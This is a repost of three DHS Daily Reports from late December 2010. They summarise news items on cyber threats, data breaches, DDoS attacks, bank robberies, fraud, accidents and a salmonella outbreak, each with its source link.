Thursday, December 30, 2010

Complete DHS Daily Report for December 30, 2010

Daily Report

Top Stories

• National Defense Magazine reports that defense companies should expect to come under non-stop attack by countries engaging in cyberespionage in 2011, experts at McAfee Labs predicted. (See items 12, 39)

12. December 28, National Defense Magazine – (National) Report: Cyber-spies to wage non-stop assaults on defense firms in 2011. Defense companies should expect to come under non-stop attack by countries engaging in cyberespionage in 2011, experts at McAfee Labs predicted. January 2010’s Operation Aurora helped coin a new term, the advanced persistent threat (APT). Aurora, believed to have originated in China, successfully infiltrated dozens of U.S. companies with the goal of stealing source codes and other data. “Companies of all sizes that have any involvement in national security or major global economic activities — even peripherally, such as a law firm advising a corporate conglomerate starting business in another country — should expect to come under pervasive and continuous APT attacks that go after email archives, document stores, intellectual property repositories, and other databases,” the report said. Source: http://www.nationaldefensemagazine.org/blog/Lists/Posts/Post.aspx?ID=277

39. December 28, NextGov – (National) McAfee: Coming cyber threats to target mobile devices, official secrets. The biggest cyber threats in 2011 are expected to include malicious applications on mobile devices and attacks aimed at stealing government secrets and sabotaging business operations, according to McAfee. The computer security firm annually issues a list predicting what will be the biggest cyber scares during the coming year. New for 2011 is the projection that perpetrators will target social media communications on mobile devices — a means of interaction that businesses, including agencies, increasingly depend on for work. The societal shift from desk-based e-mail communications to mobile instant messaging and Twitter insta-blogging has transformed the threat landscape, the report said. McAfee anticipates attackers will hide malicious software in programs that look like legitimate applications, including federal data apps, the study’s co-author and McAfee’s vice president for threat research said in an interview. According to the threat list, “friendly fire” malware, which appears to come from contacts on social networks, will grow. The motivation of attackers also is changing, according to the study. Instead of carrying out attacks to steal money or to send a political message, some groups, including nation-states and corporations, increasingly are interested in stealing intelligence. Source: http://www.nextgov.com/nextgov/ng_20101228_6846.php?oref=topnews

• According to Detroit News, a massive furniture store explosion December 29 in Wayne, Michigan, injured several people. Consumers Energy was alerted to the smell of gas near the store before the explosion. (See item 51)

51. December 29, Detroit News – (Michigan) Owner in hospital after blast at Wayne furniture store. One person has been pulled from the rubble and two others are believed trapped inside a furniture store in Wayne, Michigan that exploded the morning of December 29, shaking area homes and frightening residents, officials said. The man rescued is the owner of the William C. Franks Furniture store. He is listed in critical condition at the University of Michigan Trauma Burn Center in Ann Arbor. Officials believe two other store employees are still missing. The massive furniture store explosion occurred after 9 a.m. near Glenwood. The gas line in the area has been shut off since 11 a.m. Consumers Energy was alerted to the smell of gas near the store before the explosion and was investigating. The city has set up an emergency warming center for residents affected by the shutoff. The store, which had been a mainstay business in this community since 1963, has been reduced to rubble. The windows of buildings next door were blown out. There also were motorists injured in vehicles nearby. Preliminary information indicates that the explosion was caused by natural gas. Officials noted that the U.S. Department of Homeland Security has joined in the investigation. Source: http://www.detnews.com/article/20101229/METRO01/12290387/1409/metro

Details

Banking and Finance Sector

13. December 29, San Diego Union-Tribune – (California) FBI on the lookout for ‘Drywaller Bandit’. A $20,000 reward is being offered for information leading to the arrest and conviction of a man authorities believe committed six bank robberies in the North County area of San Diego, California since September. Dubbed the “Drywaller Bandit” because he wore a construction dust mask in some of the thefts, the robber walks into the banks, points a black semi-automatic gun at the tellers, and demands cash, FBI officials said. He has robbed three banks in Encinitas, including a U.S. Bank and a Citibank, both of which he robbed twice, as well as a Wells Fargo, officials said. All three branches are on North El Camino Real between Leucadia Boulevard and Encinitas Boulevard. Officials also believe the same man robbed a Chase Bank on College Boulevard near state Route 76 in Oceanside. The thief is described as white and in his late 20s to early 40s, about 5 feet 8 to 5 feet 10 inches tall with a medium build, about 160 to 190 pounds and brown hair. He wears dark baseball caps, gloves, sunglasses, and a dark hooded jacket with fleece lining and jeans. He covers his face with a black ski mask or a dust mask, officials said. Source: http://www.signonsandiego.com/news/2010/dec/29/fbi-lookout-drywaller-bandit/

14. December 28, KATU 2 Portland – (Oregon) FBI: Wanted Coos Bay banker turns self in. A former bank employee accused of stealing up to $1.2 million from customers of the Wells Fargo in Coos Bay, Oregon turned herself in to the FBI around 3 p.m. December 28 in Los Angeles, California. A federal judge issued an arrest warrant for the female suspect October 27 based on charges of identity theft, aggravated identity theft, credit card fraud, wire fraud, bank fraud, and money laundering. A criminal complaint charges the suspect with stealing substantial funds from Wells Fargo during her time as a bank employee. The suspect worked at the Coos Bay Wells Fargo from August 2006 to August 2010. Source: http://www.katu.com/news/business/112547934.html

15. December 28, WBNS 10 Columbus – (Ohio) Woman questioned in ‘Church Lady’ robbery at Ohio Union. Hours after a judge released an alleged bank robber on bond, she was taken back into police custody in connection with a previous robbery. The suspect was arrested December 24, minutes after police said she robbed a Fifth Third bank at 155 W. Nationwide Blvd. in Columbus, Ohio. The suspect, 46, posted $50,000 bond December 27. She was taken into custody by Columbus police shortly after 6 p.m. and transported to the Ohio State University Police Department. The FBI said it is not releasing the suspect’s photo because it is investigating the possibility that she is connected to other robberies, including those allegedly committed by the “Church Lady Bandit,” who is believed to be responsible for robberies dating back to 2008. An OSU police officer said the woman was brought in for questioning in connection with the October robbery of a U.S. Bank at the Ohio Student Union. The FBI said it believed the robbery was the work of the “Church Lady Bandit.” The woman got the church lady nickname because a witness in 2008 told police she was dressed as if she had just come from church. Source: http://www.10tv.com/live/content/local/stories/2010/12/27/story-columbus-alleged-female-bank-robber-back-in-custody.html?sid=102

16. December 27, Bloomberg – (National) JPMorgan, Citigroup delay branch openings in U.S. Northeast after storm. JPMorgan Chase & Co. and Citigroup Inc. were among U.S. banks that closed or delayed opening most of their branches in the Northeast December 27 after a blizzard dumped more than a foot of snow on the region. Business in cities from Philadelphia to Boston ground to a crawl and travel was disrupted for a second consecutive day as airports closed and train service was interrupted or halted amid waist-high snow drifts and winds gusting to 30 mph. JPMorgan, the second-largest U.S. bank by assets, and Citigroup closed all retail branches in New Jersey where authorities declared a state of emergency and closed state offices, according to company representatives. Citigroup closed branches in Boston and planned to open some in New York and Connecticut late December 27, a company spokeswoman said. Source: http://www.bloomberg.com/news/2010-12-27/jpmorgan-citigroup-delay-branch-openings-in-u-s-northeast-after-storm.html

17. December 27, WTAM 1100 Cleveland – (Ohio) FBI investigating ATM thefts in malls. Two recent ATM thefts at Cleveland, Ohio-area malls have a lot in common. The first happened December 2 at SouthPark Mall in Strongsville. A Fifth Third stand-alone ATM was taken out at night. About 3 weeks later, a Bank of America ATM was taken out of Summit Mall in Fairlawn. The FBI has joined police in trying to find the people responsible. An FBI spokesman in Cleveland thinks more than one person was involved because of the size of the ATMs. They do not know how the thieves got into the malls because, in both cases, there were no signs of a break in. Since the cases are similar, the FBI believes the same people may be responsible for both crimes. Source: http://www.wtam.com/cc-common/news/sections/newsarticle.html?feed=122520&article=7978806

Information Technology

46. December 29, Softpedia – (International) New drive-by download attack exploits recently patched IE flaw. Security Researchers from Trend Micro have intercepted a new drive-by download attack which exploits a critical Internet Explorer vulnerability to install multiple malware components on targeted systems. Drive-by download attacks are a common and effective malware propagation method and are usually launched from legitimate Web sites that have been compromised. They involve exploiting vulnerabilities in outdated versions of popular applications like Adobe Reader, Flash Player, Java, Internet Explorer, Firefox or the operating system itself, in order to silently infect computers. The exploit used in this case is detected as JS_SHELLCOD.SMGU by Trend Micro products and targets an IE vulnerability patched in Microsoft’s MS10-090 security bulletin released December 14. This bulletin is rated as critical and addresses seven vulnerabilities in Internet Explorer. Trend Micro does not mention, which one is targeted in the attack, but the most likely candidate is CVE-2010-3962. CVE-2010-3962 is an uninitialized memory corruption vulnerability, which affects all supported IE versions (6, 7, and 8) and has been actively exploited in the wild since its discovery in November. Source: http://news.softpedia.com/news/New-Drive-By-Download-Attack-Exploits-Recently-Patched-IE-Flaw-175183.shtml

47. December 29, Bloomberg – (International) Apple sued over applications giving information to advertisers. Apple Inc., maker of the iPhone and iPad, was accused in a lawsuit of allowing applications for those devices to transmit users’ personal information to advertising networks without customers’ consent. The complaint, which seeks class action, or group, status, was filed December 23 in federal court in San Jose, California. The suit claims Cupertino, California-based Apple’s iPhones and iPads are encoded with identifying devices that allow advertising networks to track what applications users download, how frequently they are used, and for how long. Apple iPhones and iPads are set with a Unique Device Identifier, or UDID, which cannot be blocked by users, according to the complaint. Apple claims it reviews all applications on its App Store and does not allow them to transmit user data without customer permission, according to the complaint. Source: http://www.businessweek.com/news/2010-12-29/apple-sued-over-applications-giving-information-to-advertisers.html

48. December 28, IDG News Service – (International) Mozilla site exposed encrypted passwords. A database of inactive Mozilla usernames and passwords was exposed on the Internet in early December, the Mozilla Foundation disclosed December 28. The database, which contained 44,000 inactive user accounts for the addons.mozilla.org site, was inadvertently placed on a public-facing Web server, wrote the Mozilla director of infrastructure security. He stressed the exposure “posed minimal risk to users.” The organization erased all the passwords, which were encrypted. It also accounted for every download of the database. Current users of addons.mozilla.org are not affected, because the organization upgraded its procedure for encrypting passwords in April 2009, he stated. Mozilla security officials were first notified of the exposure December 17 through the organization’s Web bounty program, which allows volunteers to submit security-related bugs. Source: http://www.computerworld.com/s/article/9202658/Mozilla_site_exposed_encrypted_passwords

For more stories, see items 11 and 49 below

11. December 29, Tech Herald – (National) Attackers walk with 4.9 million customer records in Honda breach. American Honda Motor Company recently discovered that 2.2 million customers were impacted by a data breach exposing the Owner Link e-mail list maintained by outsourced vendor Silverpop. In addition, a further 2.7 million records were lost when the My Acura list was hit. In a letter to customers, American Honda Motor Company said it recently became aware of “unauthorized access to an e-mail list used by a vendor to create a welcome e-mail to customers who have an Owner Link or My Acura vehicle account.” The Owner Link e-mail list contained customer names, email addresses, user names, and Vehicle Identification Numbers. The compromised My Acura list only contained e-mail addresses. Source: http://www.thetechherald.com/article.php/201052/6623/Attackers-walk-with-4-9-million-customer-records-in-Honda-breach

Communications Sector

49. December 29, The H Security – (International) 27C3 presentation claims many mobiles vulnerable to SMS attacks. According to security experts, an “SMS of death” threatens to disable many current Sony Ericsson, Samsung, Motorola, Micromax, and LG mobiles. In a presentation given to the 27th Chaos Communication Congress (27C3) in Berlin December 27, security researchers at TU Berlin claimed sending malicious text or MMS messages represents a relatively simple means of crashing current mobile phones. Some of the bugs discovered have the potential to cause problems for entire mobile networks. In recent months, the tendency has been for hackers and security testers to focus their efforts on smartphones such as the iPhone or Android-based phones. However, only 16 percent of mobile phone users possess sophisticated handsets of this type. One of the researchers suggests the possibility of targeted attacks on the entire mobile network infrastructure by, for example, causing “ten thousand mobiles to try to reconnect simultaneously.” An attack could also be concentrated on users of a specific brand of mobile. To prevent such occurrences, he called for phone manufacturers to provide more security updates and to simplify the dissemination of updates. Source: http://www.h-online.com/security/news/item/27C3-presentation-claims-many-mobiles-vulnerable-to-SMS-attacks-1159568.html

For more stories, see item 47 above in the Information Technology Sector

Wednesday, December 29, 2010

Complete DHS Daily Report for December 29, 2010

Daily Report

Top Stories

• The U.S. Embassy in London was a target of a group of men arrested in Britain and charged with conspiracy to cause explosions and preparing acts of terrorism, according to Reuters. (See item 39)

39. December 28, Reuters – (International) U.S. says embassy was target of attack. The U.S. Embassy in London was a target of a group of men arrested last week in Britain and charged with conspiracy to cause explosions and preparing acts of terrorism, the U.S. State Department said December 27. Twelve men were arrested December 20 in what British police said were counter-terrorism raids essential to protect the public from the threat of attack. Three were later released without charges, leaving nine who appeared in court December 27 to face the charges. The suspects were from London, the Welsh capital of Cardiff, and the central English city of Stoke. A British police statement said the men had conspired to cause “explosions of a nature likely to endanger life or cause serious injury to property.” It added they had been downloading material from the Internet, researching and discussing potential targets, carrying out reconnaissance, and “igniting and testing incendiary material.” The police statement did not specify what the potential targets were. Source: http://www.thepeterboroughexaminer.com/ArticleDisplay.aspx?e=2906963

CNN reports more than 200 people were trapped and several others were injured when a ski lift broke down at Sugarloaf Ski Resort in Kingfield, Maine, causing several lift riders to fall to the ground. (See item 55)

55. December 28, CNN – (Maine) Ski lift malfunction injures several at Maine resort. More than 200 people were trapped and several others were injured December 28 when a ski lift broke down at Sugarloaf Ski Resort in Kingfield, Maine, causing several lift riders to fall to the ground, a resort manager said. A spokesman for the resort said the derailment on one tower of the Spillway East lift happened around 10:30 a.m. when the lift’s cable skipped over the edge of a pulley. Five of the lift’s chairs fell 25 to 30 feet and hit the ground, he said. He later told CNN the rescue operation was complete around noon. Franklin Memorial Hospital in Farmington, Maine, received three patients and was expecting four more, according to a spokeswoman. Another patient was brought in by ambulance, but was transferred to Maine Medical Center in Portland by helicopter, he said. A CNN employee who initially was trapped on the lift said he saw skiers fall from the lift when it came to an abrupt stop during high winds. High winds were gusting between 30 mph and 50 mph in the area at the time, according to a CNN meteorologist. There were an estimated 220 people on the more than 100 chairs on the lift, and the process of evacuating everyone from the chairs dangling above the resort was under way the afternoon of December 28. Sugarloaf has never had a lift derailment of this nature in its 60-year history. The cause of the accident was under investigation. Source: http://www.cnn.com/2010/US/12/28/maine.skiers.trapped/?hpt=T1posted by bberencz

Details

Banking and Finance Sector

15. December 28, HedgeCo.Net – (Utah: International) Hedge fund manager indicted in $30 million international fraud scheme. A Utah hedge fund manager has been arraigned on multiple counts of mail fraud, wire fraud, and conspiracy, relating to his operation of a Utah-based hedge fund company, “Coadum Capital.” The suspect was indicted December 15, along with an alleged accomplice. “This indictment alleges a major international investment fraud scheme that defrauded over 100 victims around the country out of tens of millions of dollars, most of which was transferred to overseas accounts,” a prosecutor said. Coadum attracted more than $30 million in investments in 2006 and 2007. Coadum offered shares in hedge funds and advertised monthly returns of 5 percent. The indictment alleged money placed in escrow was transferred to accounts in Switzerland and the Mediterranean island of Malta, from where it then disappeared. The indictment said investors lost approximately $30 million. The charges carry a maximum sentence of 20 years in prison and a fine of up to $250,000 each. Source: http://www.hedgeco.net/news/12/2010/hedge-fund-manager-indicted-in-30-million-international-fraud-scheme.html

16. December 28, Softpedia – (International) Anonymous attacks Bank of America. Anonymous has launched a distributed denial of service attack (DDoS) against Bank of America (BoA), after the U.S.-based financial giant banned transactions destined for WikiLeaks. About 2 weeks ago, BoA joined the list of companies boycotting WikiLeaks by announcing it would block all transactions related to the whistleblower organization. All of the firms became targets of coordinated DDoS attacks by Anonymous, a notorious group of hacktivists. The holiday delayted the attack, but it launched December 27. However, as some previously predicted, a lack of organization failed to cause major problems for Bank of America. Infosec Island reported the primary impediment was technical issues with the “hive mind” feature of the LOIC DDoS tool, which normally forces the user’s computer to join a voluntary botnet. Users had to resort to filling in the target details manually and not all of them managed to do it. Even so, the BoA Web site experienced slowdowns and even went offline for short periods of time. The force of the attacks is expected to increase as the hive mind problem gets resolved and more members return from the Christmas holiday to join the effort. Source: http://news.softpedia.com/news/Anonymous-Cell-Attacks-Bank-of-America-174930.shtml

17. December 28, Associated Press – (National) Former Chicagoan accused of $8M investment fraud. Federal prosecutors have charged a former Chicago, Illinois man of swindling nearly $8 million from more than 50 victims who were led to believe they were buying specially discounted stock in a number of well-known companies, including Google Inc., and Facebook Inc. The U.S. Attorney’s office in Chicago said the 39-year-old suspect, now of Newton, Massachusetts, was charged December 27 with one count of wire fraud, and one count of filing a false federal income tax return. The office said the suspect will be arraigned at a later date, and did not say whether he had an attorney. A spokesman for the U.S. Attorney’s office, said the suspect styled himself as a self-employed securities trader while running the alleged swindle from locations in Chicago, Seattle, Boston, and Newton. Source: http://www.bloomberg.com/news/2010-12-28/former-chicagoan-accused-of-8m-investment-fraud.html

18. December 27, Press Trust of India – (International) Banks to add extra security layer for phone banking. Banks will ask for an additional password from credit card customers from the new year for any transactions conducted over phone, subsequent to a Reserve Bank of India (RBI) direction for making phone banking more secure. According to the RBI guidelines, banks must decline any telephonic banking transactions, including the automated IVR (Interactive Voice Response) services, where the customers do not have a one-time password (OTP) for such services with effect from January 1, 2011. However, OTP will be valid for a single use and would remain in effect for 2 hours. Customers will have to generate a separate OTP for each IVR transaction. The new step has been taken as a safeguard against credit card frauds. There has been an uptick in frauds involving lost or stolen cards. For transactions where cards are needed to be presented physically, RBI has already made it mandatory for an identity verification, and the signature also must match the one on the card. The added security layer for phone banking follows a similar step taken by banks for Internet banking transactions. Banks like Citibank and HDFC Bank have already told their customers to get OTP for phone banking transactions, while others are in the process of doing so. According to banking sector experts, customers who do not get an OTP before January 1, will be prompted to get one whenever they initiate a phone banking transaction. Source: http://www.business-standard.com/india/news/banks-to-add-extra-security-layer-for-phone-banking/419654/

19. December 27, Softpedia – (International) Santander exposes bank statements of over 22,000 customers. Late during the week of December 20-24, Santander’s United Kingdom branch announced a data breach where bank statements of 22,600 customers were sent to the wrong recipients. According to a bank spokesperson, the incident was the result of a printing equipment error at a third-party company paid to send the statements. “With the bank statement, the first page contains the name and address, the account number and sort code. This was correct,” a Santander spokesperson told eWEEK. The bank will send out corrected statements and will notify all affected customers about the potential privacy breach, but stressed the risk of fraud is very small. The organization has alerted the Financial Services Authority, and the Information Commissioner’s Office also launched its own probe. The printing equipment was reset after producing 35,000 statements. Source: http://news.softpedia.com/news/Santander-Exposes-Bank-Statements-of-Over-22-000-Customers-174670.shtml

20. December 27, BankInfoSecurity.com – (National) Fraud 2011: Beware cross-channel threats. Fraud in all its forms will continue to strike banking institutions across all channels in 2011. And until banks and credit unions increase investments in analytics and channel integration, they will continue to suffer losses. That’s the overall message from the Faces of Fraud: Fighting Back survey, whose results were released in an Executive Summary by Information Security Media Group. The survey, which include responses from more than 230 financial leaders and security officers at financial organizations of all sizes, reveals keen insights into the fraud landscape. The study found credit and debit card fraud ranks No. 1 among current forms of fraud, with 81 percent of respondents saying they were impacted by payment card incidents this year. Check fraud came in second, with 63 percent saying it remains a problem. Phishing and vishing-related fraud was third, getting 48 percent of respondent votes. But only 20 percent of respondents said they are prepared to fight and prevent phishing and vishing attacks. The survey also found cross-channel fraud detection is not being widely implemented, with 55 percent saying they continue to rely on manual techniques. Only 26 percent have a plan or team in place for cross-channel detection; and 63 percent said they either have no cross-channel plan or team, are working on a plan or team, or simply do not know. The study indicated 76 percent of respondents first learn of fraud incidents only when customers and members notify them. To reduce vulnerability to fraud, 63 percent said they improved customer and employee awareness through education, 40 percent said they invested in new technology and 17 percent have increased budgets and/or staff. In 2011, 34 percent of respondents will increase budgetary investments and/or personnel to improve fraud prevention. Source: http://www.bankinfosecurity.com/articles.php?art_id=3206

21. December 24, La Jolla Patch – (Colorado; California) ‘Ho-Hum Bandit’ may be robbing Colorado banks. After a 5-month bank robbery spree, the “Ho-Hum Bandit” seemed to just disappear from Southern California. It now appears as though he may have moved on to a new market. Investigators said a serial bank robber who is wanted in Colorado matches the description of Ho-Hum Bandit, who hit up 12 banks, including the Citibank in La Jolla, from late February through July. In Colorado, the robber was given a different moniker—the “JV Bandit Gone Bad,” according to a FBI Special Agent. The JV Bandit is wanted for 8 robberies in Boulder, Denver, and Fort Collins. “Just like here, he’s going every two or three weeks,” the FBI Special Agent said. The bandit is described as a white male in his 30s. He is approximately 5 foot 9 and 160 to 170 pounds. The FBI said he is fair-skinned and usually wears some type of hat, faded jeans, and white sneakers. Source: http://lajolla.patch.com/articles/ho-hum-bandit-may-be-robbing-colorado-banks

Information Technology

47. December 28, Softpedia – (International) Trojan distributed in new mass injection attack via Java downloader. Security researchers warn a new mass injection attack is underway directing the visitors of hundreds of Web sites to a malicious Java applet which downloads a Trojan. According to the creator of the Unmask Parasites Web scanner, the malicious code is added at the end of HTML pages on compromised Web sites and takes the form of an obfuscated JavaScript function. When parsed by the browser, this function adds a rogue IFrame to the HTML document, which loads a new(dot)htm page from aubreyserr(dot)com, medien-verlag(dot)de or yennicq(dot)be. According to statistics from Google’s Safe Browsing service, around 2,000 Web sites link to these domains, giving a rough estimation of the attack’s impact so far. The page called by the IFrame loads a Hidden.jar applet deceptively titled “Java Update.” This is a Java OpenConnection-type downloader whose only purpose is to download and execute a file called host.exe. Source: http://news.softpedia.com/news/Trojan-Distributed-in-New-Mass-Injection-Attack-via-Java-Downloader-174971.shtml

48. December 28, The New New Internet – (International) Texas-based whistle-blower site attacked. A Texas-based Web designer who runs idontgiveascam(dot)com — a whistle-blower site aimed at exposing online business scams — said a DDoS attack caused him an estimated $10,000 in damages and revenue loss, according to San Antonio Express-News. He said a California-based company hosts the server for his site, and it could not stop the week-long attack. After recovering from the first cyber attack, he found a message on his site from by a poster named USA, RUSSIA, GERMAN HACKERZ that read, “please close this site i give you 2 Days, when you don t close this site, i must take my botnet und we attack you again. i say that here not for funny !!!” “Some of the people on there became agitated that their business is being affected by the site,” he told San Antonio Express-News. “So they hacked the site before and they had threatened to attack.” A clue to the culprit’s identity was detected after a suspected attacker posted a comment on the site. The IP address led to Russia. Source: http://www.thenewnewinternet.com/2010/12/23/texas-based-whistle-blower-site-attacked/

49. December 28, Help Net Security – (International) Geolocation, mobile devices and Apple top the list of emerging threats. McAfee unveiled its 2011 Threat Predictions report, outlining the top threats that researchers at McAfee Labs foresee for the coming year. The list comprises 2010’s most buzzed about platforms and services, including Android, iPhone, foursquare, Google TV, and the Mac OS X platform, which are all expected to become major targets for cybercriminals. McAfee also predicts that politically motivated attacks will be on the rise, as more groups are expected to repeat the WikiLeaks paradigm. The report outlines the following top threats: Exploiting Social Media: URL-shortening services; Exploiting Social Media: Geolocation services; Mobile: Usage is rising in the workplace, and so will attacks; Apple: No longer flying under the radar; Applications: Privacy leaks — from your TV; Sophistication Mimics Legitimacy: Your next computer virus could be from a friend; Botnets: The new face of Mergers and Acquisitions; Hacktivism: Following the WikiLeaks path; Advanced Persistent Threats: A whole new category. Source: http://www.net-security.org/secworld.php?id=10374

50. December 27, eWeek – (International) Tuesday most active day for malware distributors, says SonicWALL. After analyzing the malware and online threats of 2010, SonicWALL security researchers said they found that Tuesday was the most threat-heavy day of the week. Monday was a close second for threat-related traffic, Sonic Wall’s vice-president of e-mail security told eWEEK. It was not clear from the analysis why malware activity was the highest on Tuesdays, but he speculated a connection with Microsoft’s Patch Tuesday announcements. SonicWALL researchers noticed this pattern for China, India, Mexico, South Africa, Taiwan, Turkey, the United States, and several European countries. The researchers also found the most active time for threat-related traffic in the United States was between 10 a.m. and 11 a.m. Pacific time. According to the analysis, Trojans tend to peak in September and December, corresponding with the proliferation of back-to-school offers and holiday greeting cards. However, there was also a “second wave” of threats, as attackers send follow-up scams in January, when bills come due. Source: http://www.eweek.com/c/a/Security/Tuesday-Most-Active-Day-for-Malware-Distributors-Says-SonicWALL-535925/

51. December 24, ITProPortal – (International) Facebook blocked j.mp URLs over spam fears. Facebook temporarily blocked all j.mp shortened URL links on its platform owing to spam and malware issues. The social networking platform decided to take action after it discovered that more than 70 percent of j.mp links redirected users to spam and other malicious Web sites. The company said in a statement that: “As part of our effort to keep Facebook and the people who use our service secure, we closely monitor the content shared on the site for spam and malicious content.” Facebook also said it was working with j.mp parent company Bit.ly in order to resolve the issue. According to TechCrunch, links shortened by j.mp are once again accessible from the platform. Source: http://www.itproportal.com/2010/12/24/facebook-blocked-jmp-urls-over-spam-fears/

Communications Sector

52. December 28, City News Service – (California) SoCal storms damage AT&T system. The recent heavy rainfall in Southern California damaged the telephone system to the point of creating a “natural disaster,” leaving residential and business customers throughout the region without a dial tone, an AT&T spokeswoman said December 27. “We have technicians out there, working around the clock to restore service,” she said. She could not estimate the number of service outages in Riverside or neighboring counties, but said the breadth of the damage had prompted the company to redeploy technicians from Northern to Southern California over the past several days. A spokesman with Verizon California — another major local exchange carrier — said a “significant number” of storm-related repair calls had come in, and the company had crews “working night and day” to restore phone service. He predicted it would take about 2 weeks to fix all the storm-related problems. AT&T customers have lost voice and DSL access, preventing any communication — except by mobile phone. Source: http://www.mydesert.com/article/20101228/NEWS01/12280317/1006/NEWS01/SoCal+storms+damage+AT&T+system

53. December 26, Bloomington Pantagraph – (National) FBI looking for possible victims of phone scam. The FBI is looking for people who may have been victimized by a phone bill scam. The scam involves charges on phone bills for services related to Alternate Billing Corp., 24078 Greenway Road, Forest Lake, Minnesota, or any of the following: 800VMailbox; BusinessSEOPro; Digital VMail; Durham Technology; eProtectID; eSafeId; Identity Holdings; InfoCall; Instant 411; InstantSEOPro; Matchgamepro; Mobile 411 Plus; My411Connect; MyIDSafe; MyIProducts; NeedTheInfo; ProIdentityProtect; Safeguard My Credit; Streaming Flix; Streaming Flix-FamilyWebSafety; Streaming Flix-Iconz of Rock VIP; Streaming Flix-Mobile; Streaming Flix-National Lampoon; Streaming Flix-No Good TV Digital; Streaming Flix-UBD; Studio 127; Uvolve; VolCoff. According to a statement from the Springfield office, no further information can be released because of an ongoing inquiry. The FBI does want to contact people who believe they were improperly billed. Source: http://www.pantagraph.com/news/local/article_1509582a-1153-11e0-a2ba-001cc4c03286.html

54. December 24, Winona Daily News – (Minnesota) Blaze destroys Utica Telecommunications shed. The police scanner initially reported December 23 that the water tower in Utica, Minnesota, was on fire. When the Lewiston Fire Department, which covers Utica, arrived, the fire was nearly 200 feet up a hill, with a “minimum service road” mostly covered by 18 inches of snow. More than a dozen firefighters fought the blaze in a shed next to the city’s water tower. The shed housed satellites and cable equipment for Utica Telecommunications, a cable television service provider. The building had about 100 square feet of space. The assistant Lewiston fire chief said the owner of Utica was in the shed using de-icer and heard a pop when the fire broke out. The shed is just several yards away from the city’s well that feeds the water tower, Utica’s mayor said. The city’s water supply was unaffected. “This could have been real bad if it had spread,” he said. Fire crews were able to use a gravity-fed fire hydrant near the tower to put out the fire. It took crews about 10 minutes to extinguish the blaze. Firefighters had to trudge up nearly 200 feet of hill with hoses and nozzles to out the flames. The temperature remained in the low 20s. The building was completely destroyed. Source: http://www.winonadailynews.com/news/local/article_d04fe9f6-0f0e-11e0-a35f-001cc4c03286.html

Tuesday, December 28, 2010

Complete DHS Daily Report for December 28, 2010

Daily Report

Top Stories

• CNN reports the Transportation Security Administration was unable to find a woman who breached a security checkpoint at a Texas airport December 25, despite a manhunt that left more than 100 flights delayed. (See item 23)

23. December 26, CNN – (Texas) TSA error causes big delays for Texas airport. The Transportation Security Administration (TSA) was unable to find a woman who breached a security checkpoint at a Texas airport December 25, despite a manhunt that left more than 100 flights delayed. The TSA said agents spotted something suspicious while an elderly woman went through a full-body scanner at the Dallas/Fort Worth International Airport. By the time security agents tried to pull the woman aside for additional screening, she had already moved into the terminal. TSA described the slip-up as a minor error, although it sparked a manhunt throughout the entire airport. Security agents mobilized the command post. Officers searched terminals for the woman, whose photos were given to gate agents. In the process, officers held dozens of flights in order to search planes. After 2 hours of searching, agents still were not able to locate the woman. Agents said she did nothing wrong and likely did not even realize security had flagged her. Source: http://www.ksla.com/Global/story.asp?S=13741290

• The Centers for Disease Control and Prevention announced December 24 it was investigating a 15-state outbreak of salmonella in alfalfa sprouts, according to the Crystal Lake Northwest Herald. (See item 28)

28. December 24, Crystal Lake Northwest Herald – (National) CDC reports salmonella outbreak affects 15 states. The Centers for Disease Control and Prevention (CDC) announced December 24 it was investigating a multi-state outbreak of salmonella in alfalfa sprouts, with 89 reports of a matching strain across 15 states and the District of Columbia. Preliminary results of the CDC investigation indicate a link to eating alfalfa sprouts at a national sandwich chain, the agency said. The CDC said there were reports of 50 cases in Illinois, 14 in Missouri, and 9 in Indiana. Among the 81 people for whom information was available, the CDC said the start of their illnesses ranged from November 1 to December 14, and ranged in age from 1 to 75 years old, with a median age of 28. Of the information available, the CDC said 23 percent of the people affected were hospitalized, with no deaths reported. The CDC said because the pattern associated with this salmonella type commonly occurred in the U.S., some cases currently identified might not be related to the outbreak. The outbreak first was reported December 17 when the Illinois Department of Public Health (IDPH) reported more than 40 people said they had become ill after eating alfalfa sprouts at Jimmy John’s restaurants. The IDPH’s update December 23 raised the count to 50 confirmed Illinois residents, and one Wisconsin resident, with reports stretching over 11 counties in the state. The CDC said the investigation was ongoing, and the agency would continue to monitor new cases, along with the Food and Drug Administration, and state and local public health partners. Source: http://www.nwherald.com/2010/12/23/cdc-reports-salmonella-outbreak-affects-15-states/agxgy43/

Details

Banking and Finance Sector

15. December 27, Slashgear – (International) Chip and PIN security hack prompts censorship rebuke from researchers. Cambridge University has refused to censor a masters student’s thesis on the security flaws in the Chip and PIN security system, rebuking calls from the UK Cards Association trade body to bury the research after allegations it “breaches the boundary of responsible disclosure.” According to s security group researcher, not only is the paper lawful and already in the public domain, it will soon be followed by a similarly-detailed paper on the subject. The Association claimed the loophole utilized has already been fixed when using Barclays bank cards at a Barclays merchant, though that still leaves Chip and PIN systems managed by other banks open to attack. The research had led to the creation of a card-sized monitoring device that can track transactions and flag up — among other things — cases where illegally modified card-readers show one value on-screen and then charge a higher amount to the card. Source: http://www.slashgear.com/chip-and-pin-security-hack-prompts-censorship-rebuke-from-researchers-27121248/

16. December 27, London Telegraph – (International) Online stores insure against cyber-hacking after Wikileaks protest. Online retailers will be offered insurance against cyber-hacking following the recent attack by supporters of Wikileaks. IMRG, a trade body in England, will provide protection against politically-driven “denial of service” attacks that threaten Britain’s 57.8 billion pound online shopping industry. It follows the targeting of payment services PayPal, Visa and Mastercard earlier in December by “hacktivists” who accused them of bowing to U.S. pressure to hinder the release of embarrassing diplomatic cables. Amazon was also attacked because it had removed Wikileaks information from its servers. Christmas shopping was not disrupted, but the movement behind the attacks, calling itself Anonymous, said it would mount similar campaigns in the future. A member of the online security organization ISACA and chief executive of security consultants First Base Technologies, said: “Politically-motivated denial of service is a new threat to online retail because previously the threat has only been from criminals.” Source: http://www.telegraph.co.uk/finance/newsbysector/retailandconsumer/8224968/Online-stores-insure-against-cyber-hacking-after-Wikileaks-protest.html

17. December 26, Kansas City Star – (Missouri) Springfield company files lawsuit over hacker loss. A Springfield, Missouri escrow company has filed a lawsuit against BancorpSouth Bank, accusing the bank of failing to prevent a hacker from stealing $440,000 from the escrow company. The owner of Choice Escrow and Land Title said his company had to take out a loan to cover the loss because the bank wouldn’t refund any of the money. He said it appears criminals infected the escrow company’s computer and stole its user ID and password for its BancorpSouth trust account. The Bancorp senior vice president and director of marketing in Tupelo, Mississippi, said the bank would present its side during court proceedings. He declined further comment. Source: http://www.kansascity.com/2010/12/26/2542677/springfield-company-files-lawsuit.html

